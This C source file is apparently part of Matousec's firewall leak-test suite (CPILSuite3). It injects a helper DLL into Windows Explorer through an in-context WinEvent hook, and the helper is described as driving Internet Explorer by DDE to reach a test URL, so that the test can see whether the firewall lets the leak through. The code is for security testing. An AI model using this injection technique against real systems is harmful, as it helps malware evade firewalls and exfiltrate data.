/*

 Security Software Testing Suite - CPILSuite3 (leak-test)
 Copyright by www.matousec.com, Different Internet Experience Ltd.
 http://www.matousec.com/


 Credits:

   * Based on the code and original idea of Comodo Parent Injection Leak Test Suite - Test 3
     by Comodo Group, http://www.comodo.com/.


 Method description:

   * The technique is almost the same as the technique described in "cpilsuite2.c".
     The only exception is that the helper DLL does not start the default browser with a command line parameter.
     It starts an instance of Internet Explorer and uses DDE to redirect it to the desired URL.


 Known issues and warnings:

   * Using this test may crash Windows Explorer.

*/


#include <stdio.h>
#include <windows.h>
#include <wininet.h>
#include "include/common.h"
#include "include/common-leak.h"
#include "include/common-hook.h"


int main(int argc,char *argv[])
{
  COM_CONF conf;
  if (!com_console_init_main("CPILSuite3","cpilsuite3",argc,argv,&conf,COM_TEST_TYPE_CPILSUITE3)) return 1;

  char *used_dlls[]={"user32.dll"};
  if (!com_hook_load_libraries(used_dlls,1)) return 1;

  DeleteUrlCacheEntry(conf.uri);

  int res=FALSE;

  COM_ERROR err_inf;
  err_inf.occurred=FALSE;
  char *err_prefix=COM_ERR_STANDARD_PREFIX;

  ULONG pid;
  int pres=com_get_pid_from_name(&pid,"explorer.exe",&err_inf);
  if (pres && (pid!=COM_CID_INVALID))
  {
    if (com_verbosity_get()) printf("The process of Windows Explorer found (PID = %ld).\n",pid);

    PCOM_MAPPING map=&conf.map;
    if (com_mapping_server_create(map,COM_MAP_DEFAULT_DATA_SIZE_MAX,"CPILSuite3",&conf,sizeof(conf),&err_inf))
    {
      HMODULE helper_dll=LoadLibrary("cpilsuite3dll.dll");
      if (helper_dll)
      {
        void *callback=GetProcAddress(helper_dll,"WinEventProc");
        if (callback)
        {
          HWINEVENTHOOK hook=SetWinEventHook(EVENT_MIN,EVENT_MAX,helper_dll,callback,pid,0,WINEVENT_INCONTEXT);

          if (hook)
          {
            if (com_verbosity_get()) printf("Hook installed, waiting for a signal ...\n");

            DWORD wres=WaitForSingleObject(map->event,30000);       // wait for the data
            switch (wres)
            {
              case WAIT_OBJECT_0:
              {
                if (map->data->error.occurred)
                {
                  err_prefix="\nHELPER PROCESS (Windows Explorer) ERROR: ";
                  memcpy(&err_inf,&map->data->error,sizeof(err_inf));
                } else
                {
                  if (com_verbosity_get()) printf("The signal received.\n");
                  res=TRUE;
                }

                break;
              }

              case WAIT_TIMEOUT:
                com_err_set_nc(&err_inf,"Waiting timed out.\n");
                break;

              default:
                if (wres!=WAIT_FAILED) SetLastError(ERROR_SUCCESS);
                com_err_set(&err_inf,"Unknown error occurred, WaitForSingleObject returned %ld.\n",wres);
            }

            UnhookWinEvent(hook);
          } else com_err_set(&err_inf,"Unable to install event hook.\n");
        } else com_err_set(&err_inf,"Unable to find function \"WinEventProc\" in \"cpilsuite3dll.dll\".\n");

        FreeLibrary(helper_dll);
      } else com_err_set(&err_inf,"Unable to load library \"cpilsuite3dll.dll\".\n");

      com_mapping_close(map);
    }
  } else if (pres) com_err_set_nc(&err_inf,"Unable to find Windows Explorer process \"explorer.exe\".\n");


  if (res)
  {
    char buffer[4096];
    res=com_attempt_check_ie_cache(buffer,sizeof(buffer),&conf,10000,&err_inf)
     && com_find_pattern_and_print_data(buffer,sizeof(buffer),&conf,&err_inf);
  }

  return com_end_pref(res,&err_inf,&conf,err_prefix);
}
